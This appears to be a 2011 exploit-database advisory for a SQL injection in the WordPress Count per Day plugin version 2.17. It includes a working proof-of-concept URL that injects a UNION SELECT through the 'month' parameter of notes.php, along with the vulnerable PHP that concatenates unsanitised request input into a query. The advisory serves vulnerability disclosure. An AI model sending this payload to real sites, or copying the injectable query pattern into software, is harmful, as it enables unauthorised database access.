WordPress Count Per Day 2.17 SQL Injection

2011.09.20
Credit: Miroslav Stampar
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: WordPress Count per Day plugin <= 2.17 SQL Injection Vulnerability # Date: 2011-09-05 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/count-per-day.2.17.zip # Version: 2.17 (tested) # Note: Authors done one of dirtiest things I've seen in a while :) # I've warned them 2 weeks ago about the vulnerability # They've silently updated the affected v2.17 like nothing happened # No mention of "security" fix in Changelog --- PoC --- http://www.site.com/wp-content/plugins/count-per-day/notes.php?month=-1 UNION ALL SELECT 1,version(),current_user()--%20 --------------- Vulnerable code --------------- if ( isset($_POST['month']) ) $month = $_POST['month']; // they've put (int) here else if ( isset($_GET['month']) ) $month = $_GET['month']; // they've put (int) here else $month = date_i18n('m'); ... $where = ''; if ( $month ) $where .= " AND MONTH(date) = $month "; if ( $year ) $where .= " AND YEAR(date) = $year "; $notes = $wpdb->get_results('SELECT * FROM '.$table_prefix.'cpd_notes WHERE 1 '.$where.' ORDER BY date DESC', ARRAY_A);


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top